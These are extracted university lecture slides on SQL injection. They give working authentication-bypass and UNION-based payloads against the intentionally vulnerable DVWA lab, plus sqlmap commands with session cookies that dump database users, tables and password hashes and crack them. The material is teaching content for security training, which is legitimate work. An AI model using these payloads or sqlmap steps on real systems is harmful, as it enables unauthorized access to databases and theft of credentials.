4/2/2018

 

Lecturer: Nguyễn Thị Thanh Vân – FIT - HCMUTE

 SQL Injection attacks

o Example
 Damn Vulnerable Web App – DVWA
o Examples
 Sqlmap
o Examples

4/1/2018 2

1
 4/2/2018

 SQL Injections can do more harm than just by passing

the login algorithms. Some of the attacks include
o Deleting data
o Updating data
o Inserting data
o Executing commands on the server that can download and
install malicious programs such as Trojans
o Exporting valuable data such as credit card details, email, and
passwords to the attacker’s remote server
o Getting user login details etc

4/1/2018 3

 Crack username/password
o SQL query:
SELECT * FROM Users WHERE Username='$username' AND
Password='$password‘

o Type:
$username = 1' or '1' = '1$password = 1' or '1' = '1

o The query will be:

SELECT * FROM Users WHERE Username='1' OR '1' = '1'
AND Password='1' OR '1' = '1'
 => always true (OR 1=1) => the system has authenticated the user
without knowing the username and password.

4/1/2018 4

2
 4/2/2018

 SQL query:
SELECT * FROM products WHERE id_product=$id_product
ex:
http://www.example.com/product.php?id=10

 Using the operators AND and OR.

SELECT * FROM products WHERE id_product=10 AND 1=2
Ex:
http://www.example.com/product.php?id=10 AND 1=2
=> there is no content available or a blank page.

 Then, send a true statement and check if there is a valid result:

Ex: http://www.example.com/product.php?id=10 AND 1=1

4/1/2018 5

 Damn Vulnerable Web App (DVWA) is a PHP/MySQL web

application that is damn vulnerable. Its main goals are to be an aid for
security professionals to test
 1.1 Download DVWA
 1.2 Create database and user in DVWA
 1.3 Config DVWA
 1.4 Setup basic database in DVWA
 1.5 Access DVWA
http://10.0.0.2/login.php
 Set DVWA Security Level: Low

4/1/2018 6

3
 4/2/2018

 Basic Injection: 1
 Always True Scenario: %' or '0'='0
 Display Database Version :
o %' or 0=0 union select null, version() #
 Display Database User:
o %' or 0=0 union select null, user() #
 Display Database Name
o %' or 0=0 union select null, database() #
 Display all tables in information_schema
o %' and 1=0 union select null, table_name from
information_schema.tables #

4/1/2018 7

 Display all the user tables in information_schema

o %' and 1=0 union select null, table_name from
information_schema.tables where table_name like 'user%'#
 Display all the columns fields in the information_schema
user table
o %' and 1=0 union select null,
concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' #
 Display all the columns field contents in the
information_schema user table
o %' and 1=0 union select null,
concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from
users #

4/1/2018 8

4
 4/2/2018

 sqlmap is an open source penetration testing tool that

automates the process of
o detecting and exploiting SQL injection flaws
o taking over of database servers.
 It comes with a kick-ass detection engine
 Many niche features
o the ultimate penetration tester
o a broad range of switches lasting from database fingerprinting,
o over data fetching from the database,
o to accessing the underlying file system and executing
commands on the operating system via out-of-band connections.
 Download and install Sqlmap
http://sqlmap.sourceforge.net/doc/README.html#s1
4/2/2018 9

 Open firefox: add Tamper Data to Tool

 Select Tool\Tamper Data
 Start Tamper Data

4/1/2018 10

5
 4/2/2018

 Run SQL injection

 Tamper with request
o Copying the Referer URL (Ref)
Ex: http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit
o Copying the Cookie Information (Coo)
Ex: PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low
 Run sqlmap to obtain the following pieces of information
o Obtain Database User For DVWA. Syntax:
./sqlmap.py –u <Ref> --cookie <Coo> -b --current-db --current-user
o Ex: ./sqlmap.py -u
"http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"
--cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621;
security=low" -b --current-db --current-user
Do you want to keep testing? Y => Result
4/1/2018 11

 Run sqlmap
o Obtain Database Management Username and Password. Syntax:
./sqlmap.py –u <ref> --cookie <Coo> --string="Surname" --users –
password
Use Dictionary Attack? Y
Dictionary Location? <Press Enter>
o Obtain db_hacker Database Privileges. Syntax:
./sqlmap.py –u <ref> --cookie <Coo> -U db_hacker –privileges
o Obtain a list of all databases.
./sqlmap.py –u <ref> --cookie <Coo> --dbs
o Obtain "dvwa" tables and contents
./sqlmap.py –u <ref> --cookie <Coo> -D dvwa --tables
o Obtain columns for table dvwa.users
./sqlmap.py –u <ref> -- cookie <Coo> -D dvwa -T users --columns 12

6
 4/2/2018

 Run sqlmap
o Obtain Users and their Passwords from table dvwa.users. Syntax:
./sqlmap.py –u <ref> --cookie <Coo> -D dvwa -T users -C
user,password –dump
Do you want to use the LIKE operator? Y
Recognize possible HASH values? Y
What's the dictionary location? <Press Enter>
Use common password suffixes? y

13

 use sqlmap to obtain the following pieces of information:

o A list of Database Management Usernames and Passwords.
o A list of databases
o A list of tables for a specified database
o A list of users and passwords for a specified database table.

4/1/2018 14

7
 4/2/2018

4/1/2018 15